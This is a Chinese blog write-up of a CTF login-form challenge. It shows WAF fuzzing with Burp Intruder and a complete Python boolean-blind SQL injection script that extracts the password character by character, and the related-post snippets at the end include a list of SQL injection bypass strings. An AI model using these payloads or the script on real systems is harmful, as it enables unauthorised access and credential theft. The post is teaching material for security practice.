利用 Burpsuite Fuzz 实现 SQL 注入

最新推荐文章于 2024-06-18 13:31:22 发布
最新推荐文章于 2024-06-18 13:31:22 发布
阅读量8.9k 收藏 78
点赞数 14

0x01 注入前分析

是个典型的登录框SQL注入题

图片描述

在源码上还有hint

图片描述

首先进行注入前的尝试,观察是否有报错情况,或者是有waf:

正常的输入,分2种情况:

  1. 用户名正确,显示密码错误password error

    图片描述

  2. 用户名错误,显示无此用户no such user!

    图片描述

猜测验证用户名和验证密码是分步进行的,语句如下:

select uname from user where uname='xxx'
select uname,pwd from user where uname='xxx' and pwd='xxx'

存在注入的情况,显示naive,证明是有waf的:

图片描述

简单测试了一下waf,发现过滤了or and union select from limit 以及空格,注释符,妈耶waf还挺严,之后不想通过手动测试,于是采用burpsuite进行Fuzz测试。

0x02 Burpsuite Fuzzing

Burpsuite Fuzzing主要是通过Burpsuite Intruder模块,这好比是一把枪,通过特定设置把子弹(payload)射向目标(target-site)

可是子弹从哪来?我们在这之前要做一些准备工作:

Fuzzdb:  https://github.com/fuzzdb-pro...

这是一个fuzz测试的payload库,上面有大量的测试payload,非常实用,我们本次sql注入就用到它。

我们使用这个payload就可以了 /attack/sql-injection/detect/xplatform.txt

图片描述

然后打开Burpsuite,可以先开代理抓一个正常请求包,然后转到Intruder模块,进行如下操作:

  1. 选中positions选项卡,选中uname的值部分admin,然后点击右侧的add§,这样uname的值就会被标记为payload的加载位置,其余部分就不需要标记了。

    图片描述

  2. 选中payloads选项卡,点击图中所示的按钮加载刚刚提到的xplatform.txt,这样payload就被加载进去了。

    图片描述

  3. 选中options选项卡,设置请求线程数、重试次数、超时时间等等信息,不一一列举了。

    图片描述

  4. 最后点击上方菜单Intruder -> Start attack ,启动!

等待fuzz完成后,得到如下结果:

图片描述

根据返回包长度可以分辨不同的情况:202是password error,200是no such user!,还有189是naive

因此可以发现有可以利用的地方,第42个请求包的返回用户名正确,证明已经绕过waf。

假如并没有可以利用的payload,可以再观察189的包看看哪些字段是被ban掉的,从而找到可以利用的字段。结合前期手测的情况和fuzz的结果,可以判断:

可使用:# || && , ascii() left() right() length()

不可使用:空格 -- or and union select from limit mid() substr() substring()

构造payload如下,xxx为payload,当xxx为真时返回password error,而xxx为假时返回no such user,这就构成了一个bool型注入。

uname='||xxx||'&pwd=123

下一步就可以开始实施注入。

0x03 Blind Injection的自动化注入

这一步开始,我们就通过bool盲注进行爆破pwd字段,脚本跑起来

  1. 通过length()获得pwd字段长度

    for i in xrange(1,127):
    postdata = {
        'uname':"'||length(pwd)="+str(i)+"||'",
        'pwd':'123'
    }
    print i,postdata
    r = s.post(url=url,headers=header,data=postdata)
    if 'password' in r.text:
        print "get length!"
        return

    最终获得length(pwd)=30

    当你把握不准的时候,想到hint的提示,通过 length(uname)=5验证你的payload,下面也一样。

  2. 由于mid() substr()被ban了,只能通过left() right()进行字符串截断,然后逐位爆破30位的pwd

    pwd = ''
for i in xrange(0,30):
    for c in xrange(0x20,0x7f):
        postdata = {
            'uname':"'||(ascii(right(left(pwd,"+str(i+1)+"),1))="+str(c)+")||'",
            'pwd':'123'
        }
        r = s.post(url=url,headers=header,data=postdata)
        if 'password' in r.text:
            pwd += chr(c)
            print i,pwd
            continue

    图片描述

    最后得到30位密码,登录进去,getflag

    PS:没有写多线程,爆破速度比较慢,之后考虑改进一下

    PPS:之后还要总结下各类函数组合使用方式,比如mid()=substr()=right(left())

    完整脚本如下:

    #coding=utf-8
import requests 

s = requests.session()
s.keep_alive = False

url = 'http://23.236.125.55:1000/34fb69d7b4467e33c71b0153e62f7e2b/'

header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://23.236.125.55:1000/34fb69d7b4467e33c71b0153e62f7e2b/',
'Content-Type': 'application/x-www-form-urlencoded'
}

def get_length():
    for i in xrange(1,127):
        postdata = {
            'uname':"'||length(pwd)="+str(i)+"||'",
            'pwd':'123'
        }
        print i,postdata
        r = s.post(url=url,headers=header,data=postdata)
        if 'password' in r.text:
            print "get length!"
            return 

def get_pwd_char():
    pwd = ''
    for i in xrange(0,30):
        for c in xrange(0x20,0x7f):
            postdata = {
                'uname':"'||(ascii(right(left(pwd,"+str(i+1)+"),1))="+str(c)+")||'",
                'pwd':'123'
            }
            r = s.post(url=url,headers=header,data=postdata)
            if 'password' in r.text:
                pwd += chr(c)
                print i,pwd
                continue

if __name__ == '__main__':
    get_length() #length is 30
    get_pwd_char()

0x04 总结一下

  • 利用burpsuite进行fuzz测试,大大提高了测试效率,也能快速定位注入点,这方面在平时的赛题也比较实用,关键就在于找到好用的fuzz payload。
  • 灵活使用各类sql函数,找到没有被ban的函数进行构造从而实现爆破,如果遇到其他类型waf还要进行改写。
据说bugkuCTF有类似的一道题 SQL注入2,过去比较一下区别
hahazaizheli
关注
  • 14
    点赞
  • 78
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
【Burp入门第二十三篇】Burpsuite+SQL注入实现登录绕过等+实战案例
等风来
04-08 663
在 Oracle 数据库上,每个语句都必须指定一个要选择的表。Oracle 上有一个名为。只有商品名匹配且该商品已发布(released=1),客户端才能回显数据。只有商品名匹配且该商品已发布(released=1),客户端才能回显数据。点击Lifestyle时,页面回显。查询数据库类型及版本(存在一个业务场景如下。
SQL注入fuzz字典
02-28
sql注入时很多关键的字符和关键字都过滤了,被称非法,一个一个测试不现实。可以使用该字典,用burp suite跑了一下来判断被过滤的字符。其中长度367表示可用,370表示非法字符,被过滤了。
Fuzz工具对比及使用体验
最新发布
白帽黑客佳哥的博客
06-18 771
模糊测试(Fuzz Testing)是一种。
SQLI FUZZ字典
weixin_44364851的博客
12-19 1376
“or “a”=“a ')or(‘a’=‘a or 1=1– ‘or 1=1– a’or’ 1=1– "or 1=1– ‘or’a’=‘a “or”="a’=‘a ‘or’’=’ ‘or’=‘or’ 1 or ‘1’=‘1’=1 1 or ‘1’=‘1’ or 1=1 'OR 1=1 “or 1=1 'xor ‘or 1=1/* 1’or’1’=‘1 ’ a’ or 1=1– “a”” or 1=1–” or a = a a’ or ‘a’ = ‘a 1 or 1=1 a’ waitfor delay ‘0
burpsuite小技巧,实现Fuzz测试
weixin_44894271的博客
12-29 5512
前言 Fuzz testing是生成大量数据并且对系统产生大量异常请求,通过大量恶意请求查找漏洞。在这个过程中我们可以依赖于部分工具来实现参数化,本文以burpsuite为工具以文件上传为例 拦截请求 启动burpsuite并且开启代理后请求一次文件上传,进入BurpSuite → Proxy →HTTP history,右键点击刚才的请求选择Send to Intruder 修改fuzz测试值 进入Intruder→Positions,可以看到请求参数中有"§"符号包裹的内容,被包裹的内容就是需要被参数
(未完成版)Hack World
m0_75178803的博客
04-13 80
Fuzz是一种基于黑盒的自动化软件模糊测试技术,简单的说一种懒惰且暴力的技术融合了常见的以及精心构建的数据文本进行网站、软件安全性测试;输入字符时的boo提示,那这里就得考虑布尔注入。在cmd界面安装requests库的前提下。用python执行脚本得到flag。
BurpSuite Fuzz
weixin_46104215的博客
10-18 407
转载:利用 Burpsuite Fuzz 实现 SQL 注入_凡宇-CSDN博客
mysql注入fuzz字典_Fuzz绕过安全狗4.0实现SQL注入
weixin_39880490的博客
01-28 320
0×00 前言本文使用了burp的intruder模块进行fuzz,并修改了sqlmap工具的tamper脚本,对安全狗进行绕过。0×01注入绕waf过常用手法使用大小写绕过使用/**/注释符绕过使用大的数据包绕过使用/!**/注释符绕过……0×02本文使用的手法是/**/注释符首先搭建好一个有sql注入的测试平台,在服务器安装安全狗4.0版本中间件和数据库使用的是apache+mysql+php...
渗透测试-SQL注入Fuzz绕过WAF
lza20001103的博客
04-21 4367
渗透测试-SQL注入Fuzz绕过WAF
使用sqlmap+burpsuite进行中级sql注入
06-01
本篇将详细介绍如何结合sqlmap和BurpSuite工具进行中级SQL注入的实战操作。 首先,我们需要了解sqlmap和BurpSuite的基本功能。sqlmap是一款自动化SQL注入工具,它能自动检测和利用SQL注入漏洞,获取数据库信息。...
burpsuite小白教程。手把手教学 使用burpsuite拦截浏览器请求,修改请求参数,查看返回结果
06-09
总的来说,Burpsuite是Web安全领域的一款强大工具,通过学习这个教程,你可以掌握如何利用它进行基本的网络请求拦截、修改和分析,从而提升你的安全测试技能。记住,实践是掌握任何工具的关键,所以不要害怕尝试和...
利用Burpsuite爆破Tomcat密码1
08-03
格式: 户名:密码 => admin:123456 => YWRtaW46MTIzNDU2这我们可以采Metasploit中的tomcat爆破辅助模块,当然也可
BurpSuite使用介绍(一)
02-21
BurpSuite是用于攻击web应用程序的集成平台。它包含了许多工具,并为这些工具设计了许多接口,以促进加快攻击应用程序的过程。所有的工具都共享一个能处理并显示HTTP消息,持久性,认证,代理,日志,警报的一个强大...
推荐一款字典爆破工具 -- FuzzPayloadGennerator
Python栈
06-27 1137
一款BurpSuite插件,主要是解决我日常爆破时字典的需要,收集的字典数据太多了,有时想要指定特征的爆破字典就要自己手撸, 所以就想着写个插件了,可以自己通过配置生成字典了, 未来会持续写,把日常可能使用到的都实现了,主要是太懒了。
精通BurpsuiteSQL注入测试的实验操作步骤详解
weixin_43822401的博客
05-25 730
在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过注入恶意SQL代码来操纵后端数据库。Burpsuite作为一款领先的Web安全测试工具,提供了一系列的功能来帮助安全专家发现和防御这类漏洞。本文将详细介绍如何使用Burpsuite进行SQL注入测试的实验操作步骤。通过遵循这些详细的实验操作步骤,安全专家可以更有效地使用Burpsuite进行SQL注入测试。通过本文的指导,读者应该能够掌握使用Burpsuite进行SQL注入测试的关键步骤,提升自己的安全测试能力。
网络攻防之——Fuzz工具
热门推荐
The__Apollo的博客
04-05 1万+
FUzz是一个模糊测试工具模糊测试是漏洞挖掘过程中重要的一步bed.plBed是一个纯文本协议的Fuzz工具,能够检查常见的漏洞,如缓冲区溢出,格式串漏洞,整数溢出等。Fuzz_ipv6这是THC出品的针对IPV6协议的模糊测试工具0hrwurm这是一个迷你的对RTP的fuzz工具,主要针对SIP通信的fuzzpowerfuzzer是一个有图形化界面的工具, burpsuite等web代理工具
探索网络安全新维度:Xss-Sql-Fuzz 工具深度解析
gitblog_00047的博客
04-21 947
探索网络安全新维度:Xss-Sql-Fuzz 工具深度解析 项目地址:https://gitcode.com/jiangsir404/Xss-Sql-Fuzz 在数字化时代,网络安全成为了不容忽视的重要议题。其中,跨站脚本(XSS)和SQL注入是两种常见的Web应用安全漏洞。为了帮助开发者发现并防御这些威胁,Xss-Sql-Fuzz项目应运而生。这是一个功能强大的自动化测试工具,旨在检测Web应...
[ctf web]基于多线程的sql注入fuzz测试过滤参数模板
qq_37301470的博客
11-05 526
import requests import threading import math def burp(threads,url): #把测试sql关键字传入text列表 with open(r"C:\Users\ZZY\Desktop\杂项\bugku\python脚本\sql\fuzz\fuzz.txt",'r') as f: #这里的地址是字典所在的绝对地址 text=f.readlines() #thread_num是每个线程负责关键字个数 thread_n
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30322969的博客
01-28 682
0x0 前言0x1 注入点检测0x2 bypass waf0x3 自动化0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有的时候略微有些奇葩的环境,再加上...
burpsuite fuzz sql注入
02-19
Burp Suite是一款常用的Web应用程序安全测试工具,其中的Fuzzing功能可以用于检测和利用SQL注入漏洞。SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL查询语句来绕过应用程序的身份验证和访问控制,甚至获取敏感数据。 在Burp Suite中使用Fuzzing功能进行SQL注入测试的步骤如下: 1. 配置目标:在Burp Suite中,选择要测试的目标应用程序,并配置代理设置,确保所有的流量都经过Burp Suite进行拦截和修改。 2. 构造注入点:在目标应用程序中找到可能存在SQL注入漏洞的参数或输入字段,并将其标记为注入点。可以使用Burp Suite的Intruder工具来自动识别和标记注入点。 3. 准备Payloads:准备一组恶意的SQL注入Payloads,这些Payloads将被插入到注入点中进行测试。Payloads可以包括常见的SQL注入语句、特殊字符、SQL函数等。 4. 配置Fuzzing:在Burp Suite的Intruder工具中,选择要进行Fuzzing的请求,并将注入点设置为Payload位置。将准备好的Payloads加载到Intruder中,并配置其他相关选项,如并发请求数、超时时间等。 5. 启动Fuzzing:启动Fuzzing过程,Burp Suite将自动发送带有不同Payloads的请求,并记录每个请求的响应。可以通过查看响应中的错误信息、时间延迟等来判断是否存在SQL注入漏洞。 6. 分析结果:根据Fuzzing的结果,分析每个请求的响应,查找异常或错误的迹象。如果发现响应中包含SQL错误信息、应用程序行为异常等,可能存在SQL注入漏洞。 需要注意的是,在进行SQL注入测试时,应该遵循合法和道德的原则,仅在授权范围内进行测试,并避免对生产环境造成任何损害。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值